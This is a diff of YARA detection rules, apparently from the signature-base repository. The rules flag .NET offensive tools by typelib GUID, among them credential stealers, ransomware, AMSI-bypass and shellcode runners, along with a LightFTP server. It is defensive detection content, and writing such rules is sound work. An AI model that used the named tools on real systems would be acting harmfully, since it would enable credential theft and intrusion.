 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Get_RBCD_Threaded : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ladon : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fdef6dc3-da1a-5a98-a822-94e443981fdd"
-		date = "2023-03-22"
+		id = "57e3d2fa-d430-561b-9d42-cf58cda5ed7a"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/FatRodzianko/Get-RBCD-Threaded"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5384-L5398"
+		reference = "https://github.com/k8gege/Ladon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L56-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c771f3cf70901b6e60ec5a721e214e7c6c95169070d071caa870ca9f6235519f"
+		logic_hash = "f6fdcc7795808e6612be5db336ed04039b592fce459127b4f2d6170f520b0f85"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e20dc2ed-6455-4101-9d78-fccac1cb7a18" ascii wide
-		$typelibguid0up = "E20DC2ED-6455-4101-9D78-FCCAC1CB7A18" ascii wide
+		$typelibguid0lo = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii wide
+		$typelibguid0up = "C335405F-5DF2-4C7D-9B53-D65ADFBED412" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Whisker : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Whitelistevasion : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ecb0c59f-2111-58d9-8dc9-dfe005cad3be"
-		date = "2023-03-22"
+		id = "cd2740d0-0315-5a32-b34a-1998024fcc06"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/eladshamir/Whisker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5400-L5414"
+		reference = "https://github.com/khr0x40sh/WhiteListEvasion"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L72-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "937998140d3487e7d490be50525ab6d42309e2198d3d2afe4e3c73ad14517b57"
+		logic_hash = "39ec3d49a6fa17dca59bfee0d312c5d57a46ee0c827c01b6e25d3b107adaba04"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "42750ac0-1bff-4f25-8c9d-9af144403bad" ascii wide
-		$typelibguid0up = "42750AC0-1BFF-4F25-8C9D-9AF144403BAD" ascii wide
+		$typelibguid0lo = "858386df-4656-4a1e-94b7-47f6aa555658" ascii wide
+		$typelibguid0up = "858386DF-4656-4A1E-94B7-47F6AA555658" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shadowspray : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Downloader : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "91dd52ef-07a1-5ffd-b5c3-59bca18d4c7c"
-		date = "2023-03-22"
+		id = "bfb0f97c-6d95-5e11-ad11-5297bcf7c3df"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/Dec0ne/ShadowSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5416-L5430"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Downloader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L88-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d5992f9f58b6f7254fd8436aa32c6744d7a7ac3c70d94b3d7325c7a4c720475"
+		logic_hash = "51e7facdbfc47f6af8f1e7408b3817e878afddb9a1bd2fbf3fabfe97746a3964"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7e47d586-ddc6-4382-848c-5cf0798084e1" ascii wide
-		$typelibguid0up = "7E47D586-DDC6-4382-848C-5CF0798084E1" ascii wide
+		$typelibguid0lo = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii wide
+		$typelibguid0up = "EC7AFD4C-FBC4-47C1-99AA-6EBB05094173" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Malsccm : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Darkeye : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a88532b-e2bc-5ce9-828d-6ef62d91f6b9"
-		date = "2023-03-22"
+		id = "5dc6702f-a398-5be2-9df8-9a2ddc636a1f"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/nettitude/MalSCCM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5432-L5446"
+		reference = "https://github.com/K1ngSoul/DarkEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L104-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "429da06c863b73263f6de7acba0e8479cc2ad45af45d85ce846fce6f7e0b3b64"
+		logic_hash = "ce1f7f9bb621ebc2bc0701084436d1932f33071483aac9c487e00ca911da4ddd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5439cecd-3bb3-4807-b33f-e4c299b71ca2" ascii wide
-		$typelibguid0up = "5439CECD-3BB3-4807-B33F-E4C299B71CA2" ascii wide
+		$typelibguid0lo = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii wide
+		$typelibguid0up = "0BDB9C65-14ED-4205-AB0C-EA2151866A7F" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Spoolsample : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpkatz : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "38346575-cf5b-59bf-b2b2-21aacf05b8a4"
-		date = "2023-03-22"
+		id = "ff084b4c-4b00-5504-85ee-d6d17b5be504"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/leechristensen/SpoolSample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5448-L5462"
+		reference = "https://github.com/b4rtik/SharpKatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L120-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a57e5675d8e24a7288d070f8e764c5253797bf7ed3e4b1a3fba0a6e1777317e9"
+		logic_hash = "1e2e5be3256ad24da47096d8d7dbdaec139d4ca136a95957f505e1ec3bb3824f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "640c36b4-f417-4d85-b031-83a9d23c140b" ascii wide
-		$typelibguid0up = "640C36B4-F417-4D85-B031-83A9D23C140B" ascii wide
+		$typelibguid0lo = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii wide
+		$typelibguid0up = "8568B4C1-2940-4F6C-BF4E-4383EF268BE9" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpoxidresolver : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Externalc2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e8a957bc-3319-51c2-8289-01bd0b8a632a"
-		date = "2023-03-22"
+		id = "1bbdfbb9-a3e8-5ffe-9db9-b50937e6a14d"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpOxidResolver"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5464-L5478"
+		reference = "https://github.com/ryhanson/ExternalC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "809ee7d9063700dbea2d33d01e4fb6b58ca9360fb6705f05eadb78fa0a2b2fb2"
+		logic_hash = "90d05afe605d90dd61e8f5095125eb30c2b7a781b90b9ab42ee8391823b53b83"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ce59f8ff-0ecf-41e9-a1fd-1776ca0b703d" ascii wide
-		$typelibguid0up = "CE59F8FF-0ECF-41E9-A1FD-1776CA0B703D" ascii wide
+		$typelibguid0lo = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii wide
+		$typelibguid0up = "7266ACBB-B10D-4873-9B99-12D2043B1D4E" ascii wide
+		$typelibguid1lo = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii wide
+		$typelibguid1up = "5D9515D0-DF67-40ED-A6B2-6619620EF0EF" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcat : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Povlsomware : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "450d13c6-93ae-5bf5-bdde-d874ab6c0cd5"
-		date = "2023-11-30"
-		modified = "2024-04-24"
-		reference = "https://github.com/theart42/Sharpcat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5480-L5492"
+		id = "0eba43d2-b415-5e72-9677-4a3238ff7c34"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/povlteksttv/Povlsomware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L154-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "143757610d66c5d7bbba96ef810d518f38ad8ea0e924be23aa59e8c514154fe0"
+		logic_hash = "681603aa09b83f1a5a56c26204a4a5338c14627f977b29d3edc28a50149756d4"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "d16fd95f-23ce-4f8d-8763-b9f5a9cdd0c3" ascii nocase wide
+		$typelibguid0lo = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii wide
+		$typelibguid0up = "FE0D5AA7-538F-42F6-9ECE-B141560F7781" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpnamedpipepth : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Runshellcode : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "561b95a5-f32b-5fe8-9e67-3f702306be93"
-		date = "2023-11-30"
-		modified = "2024-04-24"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5494-L5506"
+		id = "249da967-68b0-59b1-b414-4eb4fe67b8f3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/zerosum0x0/RunShellcode"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L170-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "437a8a41073174e86f642717537bdeeb5343cc8683c95477a52d6801a46aac21"
+		logic_hash = "de9bb2689e10d8a4d4830f6fb5ac35f4433ece1fe61e0f04d72a125e85235a64"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide
+		$typelibguid0lo = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii wide
+		$typelibguid0up = "A3EC18A3-674C-4131-A7F5-ACBED034B819" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptokenfinder : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharploginprompt : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "60fd06be-041b-5fa8-8f25-41b26605ea90"
-		date = "2023-12-06"
-		modified = "2024-04-24"
-		reference = "https://github.com/HuskyHacks/SharpTokenFinder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5508-L5520"
+		id = "e9a493d9-21b6-5ff1-9e5e-e8fbacc34c0c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/shantanu561993/SharpLoginPrompt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L186-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9681a13b094b6e05cab69f0684d52e3bb3b465cfcdb1c83a890c9c8fda79169"
+		logic_hash = "a34873666a7a4a8aff77281fe638b1fd244f5295702cf815846ff64bcc21e360"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "572804d3-dbd6-450a-be64-2e3cb54fd173" ascii nocase wide
+		$typelibguid0lo = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii wide
+		$typelibguid0up = "C12E69CD-78A0-4960-AF7E-88CBD794AF97" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprodc : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adamantium_Thief : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "60779e7a-048f-5095-b853-fd90c4f7449e"
-		date = "2023-12-06"
-		modified = "2024-04-24"
-		reference = "https://github.com/wh0amitz/SharpRODC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5522-L5534"
+		id = "82225b2e-ab4a-50b8-a3fd-7ad4947d052e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/LimerBoy/Adamantium-Thief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L202-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3d24237804509d2bf241f7310843591608a9d7e8abb38eb324aa5909995ebfaf"
+		logic_hash = "089fdba95fb53d412eca2e1188bf9b8211045793122a73ed6c0ea5ee5c386c47"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "d305f8a3-019a-4cdf-909c-069d5b483613" ascii nocase wide
+		$typelibguid0lo = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii wide
+		$typelibguid0up = "E6104BC9-FEA9-4EE9-B919-28156C1F2EDE" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gmsapasswordreader : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Psbypassclm : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dc74bfce-90a1-53bd-bfe4-cb7c9c75da53"
-		date = "2023-12-06"
-		modified = "2024-04-24"
-		reference = "https://github.com/rvazarkar/GMSAPasswordReader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5536-L5548"
+		id = "dad6729f-3d96-5d2d-b72c-a96d1a3eae74"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/padovah4ck/PSByPassCLM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L218-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8db260b15b8b8158e5f66268b9086b456386af017e4351025ea27b9f994e5bf5"
+		logic_hash = "45538484f473f2940344fb89181e309b9925619ea6cf7e66a106cea9e9c6f281"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "c8112750-972d-4efa-a75b-da9b8a4533c7" ascii nocase wide
+		$typelibguid0lo = "46034038-0113-4d75-81fd-eb3b483f2662" ascii wide
+		$typelibguid0up = "46034038-0113-4D75-81FD-EB3B483F2662" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsharefinder : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Physmem2Profit : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bb485347-ea9b-5f26-99ad-bedc38bfecd5"
-		date = "2023-12-19"
-		modified = "2024-04-24"
-		reference = "https://github.com/mvelazc0/SharpShareFinder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5550-L5562"
+		id = "75a27970-c469-53da-b0c3-b3d0faea0b6f"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/FSecureLABS/physmem2profit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L234-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72b2c6c9f4da68ba8e9656ff2d9da962f9d791f031c1d7fb74d74ddd17ba49de"
+		logic_hash = "60385891640e18699e17d1282b4af03ecd0ea3ceaf153bf54560242097595b2f"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "64bfeb18-b65c-4a83-bde0-b54363b09b71" ascii nocase wide
+		$typelibguid0lo = "814708c9-2320-42d2-a45f-31e42da06a94" ascii wide
+		$typelibguid0up = "814708C9-2320-42D2-A45F-31E42DA06A94" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Postdump : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Noamci : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7f33e76c-0227-5c23-b821-c5c9753e2384"
-		date = "2023-12-19"
-		modified = "2024-04-24"
-		reference = "https://github.com/YOLOP0wn/POSTDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5565-L5577"
+		id = "5fab1551-9d35-53cf-a04f-c14370119553"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/med0x2e/NoAmci"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L250-L264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e5bbef2fe7122855d7e5300ebf78631149e60b08793a4a21a4ac8b337f4bee60"
+		logic_hash = "4e4b7f6424ce77959bcc017e5f6d36059dda05df7ac09bc7055102c4ff2c10c0"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "e54195f0-060c-4b24-98f2-ad9fb5351045" ascii nocase wide
+		$typelibguid0lo = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii wide
+		$typelibguid0up = "352E80EC-72A5-4AA6-AABE-4F9A20393E8E" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Lightftp_Fftp_X86_64 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpblock : FILE
 {
 	meta:
-		description = "Detects a light FTP server"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b62e990-1d8b-5d30-bb58-1f7f12552834"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/LightFTP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pup_lightftp.yar#L2-L21"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b84538da-1b0e-50c7-abfa-e93d6de5a49b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/CCob/SharpBlock"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L266-L280"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f29a98a4014fc6c026aef4054bc2bee7bde2e9ad7f26f2368fdf0949f50847bb"
-		score = 50
+		logic_hash = "4e2583de504884f421425f86fc4364e5bdde55946c19eebbcc64933e03357622"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
-		hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
 
 	strings:
-		$s1 = "fftp.cfg" fullword wide
-		$s2 = "220 LightFTP server v1.0 ready" fullword ascii
-		$s3 = "*FTP thread exit*" fullword wide
-		$s4 = "PASS->logon successful" fullword ascii
-		$s5 = "250 Requested file action okay, completed." fullword ascii
+		$typelibguid0lo = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii wide
+		$typelibguid0up = "3CF25E04-27E4-4D19-945E-DADC37C81152" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Lightftp_Config : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nopowershell : FILE
 {
 	meta:
-		description = "Detects a light FTP server - config file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02ee1d04-1425-5dfd-9b9a-cd378aeda311"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/LightFTP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pup_lightftp.yar#L23-L41"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0fd7496b-e34f-51f7-9270-ad424ed6a7a8"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/bitsadmin/nopowershell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L282-L296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ce9821213538d39775af4a48550eefa3908323c5"
-		logic_hash = "1e8c06dac9a5910816703ed15bef83116d9e2d9e612fda69697170ed98ee5f60"
+		logic_hash = "29ce3eaf0eca016fd72b54c8773226102cabcfd65d172e42fffe1c29e79d16ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "maxusers=" wide
-		$s6 = "[ftpconfig]" fullword wide
-		$s8 = "accs=readonly" fullword wide
-		$s9 = "[anonymous]" fullword wide
-		$s10 = "accs=" fullword wide
-		$s11 = "pswd=" fullword wide
+		$typelibguid0lo = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii wide
+		$typelibguid0up = "555AD0AC-1FDB-4016-8257-170A74CB2F55" ascii wide
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 1KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
